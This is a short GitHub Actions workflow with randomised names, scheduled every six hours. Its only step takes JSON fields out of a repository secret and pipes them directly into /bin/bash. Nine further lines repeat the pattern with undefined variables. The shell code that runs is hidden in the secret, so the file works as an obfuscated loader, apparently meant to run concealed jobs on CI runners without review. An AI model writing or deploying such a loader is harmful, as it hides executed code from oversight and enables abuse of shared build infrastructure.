name: xiuqingcx
on:
  workflow_dispatch:
  schedule:
    - cron: '34 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiuqingcx
        env:
          dhmfa85: ${{ secrets.dhmfa85 }}
        run: |
          echo $dhmfa85 | jq -r .lxamt14 | /bin/bash
          echo $m196 | jq -r .i2 | /bin/bash
          echo $yygjq012 | jq -r .ywb79594 | /bin/bash
          echo $mz7 | jq -r .mlsd55476 | /bin/bash
          echo $yflwz759 | jq -r .wjfv585 | /bin/bash
          echo $smail4 | jq -r .hy66832 | /bin/bash
          echo $pivdp992 | jq -r .mnepo3 | /bin/bash
          echo $th06 | jq -r .twaw112 | /bin/bash
          echo $up87 | jq -r .euvn15539 | /bin/bash
          echo $wr7383 | jq -r .lqeb432 | /bin/bash

